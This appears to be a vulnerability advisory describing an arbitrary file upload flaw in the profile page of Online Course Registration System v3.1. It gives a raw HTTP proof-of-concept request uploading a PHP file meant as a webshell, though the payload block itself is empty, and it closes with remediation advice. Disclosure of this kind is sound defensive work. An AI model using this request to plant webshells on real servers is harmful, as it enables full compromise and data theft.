# Online Course Registration System v3.1 Arbitrary File Upload Vulnerability Summary ## Vulnerability Overview * **Vulnerability Name**: Online Course Registration System v3.1 - Arbitrary File Upload Vulnerability in `/my-profile.php` * **Vulnerability Type**: Arbitrary File Upload * **Root Cause**: The `/my-profile.php` page does not perform effective validation or filtering on user-uploaded files, allowing attackers to upload executable PHP script files (e.g., `.php`, `.phtml`). * **Exploitation Conditions**: Authentication required (user must be logged in as a student). ## Impact Scope * **Affected Product**: Online Course Registration v3.1 * **Affected Version**: v3.1 * **Potential Impact**: Attackers can upload malicious WebShells and execute arbitrary commands on the server, leading to complete system compromise, sensitive data leakage, or service disruption. ## Vulnerability Exploitation Code (POC) **Payload (WebShell Content):** ```php ``` **Raw HTTP Request (Burp Suite):** ```http POST /onlinecourse/my-profile.php HTTP/1.1 Host: 127.0.0.1 Content-Length: 727 Cache-Control: max-age=0 sec-ch-ua: "Chromium";v="133", "Not(A:Brand";v="99" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://127.0.0.1/onlinecourse/my-profile.php Accept-Encoding: gzip, deflate, br Cookie: PHPSESSID=wm0crfha4rln2dofmxeqjxm Connection: keep-alive ------WebKitFormBoundaryDxfpm20kZxjeT8i Content-Disposition: form-data; name="studentname" Anuj kumar ------WebKitFormBoundaryDxfpm20kZxjeT8i Content-Disposition: form-data; name="studentregno" 10000121 ------WebKitFormBoundaryDxfpm20kZxjeT8i Content-Disposition: form-data; name="Pincode" 822004 ------WebKitFormBoundaryDxfpm20kZxjeT8i Content-Disposition: form-data; name="cgpa" 7.10 ------WebKitFormBoundaryDxfpm20kZxjeT8i Content-Disposition: form-data; name="photo"; filename="muma.php" Content-Type: application/octet-stream ------WebKitFormBoundaryDxfpm20kZxjeT8i Content-Disposition: form-data; name="submit" ------WebKitFormBoundaryDxfpm20kZxjeT8i-- ``` ## Remediation Measures 1. **Implement Whitelisting**: Only allow specific file extensions (e.g., `.jpg`, `.png`, `.gif`) for uploads; avoid using blacklists. 2. **Check MIME Types and File Signatures**: Verify that the file extension matches the actual content. 3. **Rename Uploaded Files**: Use randomly generated filenames to prevent attackers from guessing paths. 4. **Set Non-Executable Permissions**: Configure the server to prohibit execution of PHP scripts in the upload directory. 5. **Isolate File Storage**: Store uploaded files outside the web root directory and access them via links rather than direct exposure. 6. **Enable WAF or Security Rules**: Deploy tools such as ModSecurity to detect suspicious upload activities. 7. **Conduct Regular Security Testing**: Perform code reviews and security testing to maintain system integrity.